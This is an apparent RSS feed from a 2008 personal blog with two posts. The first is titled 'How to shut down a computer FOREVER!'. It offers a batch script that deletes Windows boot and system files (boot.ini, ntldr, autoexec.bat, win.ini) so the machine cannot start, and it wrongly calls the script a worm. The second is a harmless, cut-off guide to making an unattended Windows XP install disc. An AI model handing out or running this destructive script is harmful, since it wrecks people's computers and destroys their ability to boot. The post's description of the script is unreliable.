﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0"><channel><title><![CDATA[guru_boy's BLOG]]></title><link>http://blog.bitcomet.com/7546983/</link><description><![CDATA[]]></description><language>en-us</language><copyright>bitcomet.com</copyright><pubDate>Sat, 27 Sep 2008 04:55:58 GMT</pubDate><lastBuildDate>Sat, 27 Sep 2008 04:55:58 GMT</lastBuildDate><generator>bitcomet.com</generator><docs>http://cyber.law.harvard.edu/rss/rss.html</docs><ttl>30</ttl><item><title><![CDATA[How to shut down a computer FOREVER!]]></title><link>http://blog.bitcomet.com/post/68144/</link><description><![CDATA[<p>
How to shut down a computer FOREVER!
</p>
<p>
&nbsp;
</p>
<p>
CODE
</p>
<p>
&nbsp;
</p>
<p>
echo off<br />
attrib -r -s -h c:\autoexec.bat<br />
del c:\autoexec.bat<br />
attrib -r -s -h c:\boot.ini<br />
del c:\boot.ini<br />
attrib -r -s -h c:\ntldr<br />
del c:\ntldr<br />
attrib -r -s -h c:\windows\win.ini<br />
del c:\windows\win.ini
</p>
<p>
&nbsp;
</p>
<p>
// note save the above code as .com extension this is actually a worm and //shut down the xp such that boot strap loader will never be able to conduct //the initialization of os untill a new os is installed
</p>
<p>
&nbsp;
</p>]]></description><author>guru_boy</author><pubDate>Sat, 27 Sep 2008 04:55:58 GMT</pubDate></item><item><title><![CDATA[AUTOMATED INSTALLATION OF XP]]></title><link>http://blog.bitcomet.com/post/68143/</link><description><![CDATA[Automate Installation of XP<br />
You can create a CD that can install Windows XP automatically, putting in all the details and answering all the dialog boxes.<br /> <br />
The secret behind this is the answer file, which tells Windows what to do while it's installing. The answer file can be created using Windows setup manager.<br /> <br />
Using this tool, you can make the answer file so powerful that you can even tell Windows to include or exclude individual components, set the display resolution, and more.<br /> <br />
Here's the Steps involved in creating XP Automated Installation Disc:<br /> <br />
Step 1: To begin with, insert your Windows XP installation CD into the drive and copy the entire contents of the CD to a new folder on your hard disk.<br /> <br />
Step 2: Navigate to the Support &gt; Tools folder on the CD and double-click the Deploy.cab file. Copy all the files to a new folder on your hard disk.<br /> <br />
Step 3: The crucial part begins now, creating the answer file. To execute the windows setup manager, double click the Setupmgr.exe file from......]]></description><author>guru_boy</author><pubDate>Sat, 27 Sep 2008 04:48:18 GMT</pubDate></item></channel></rss>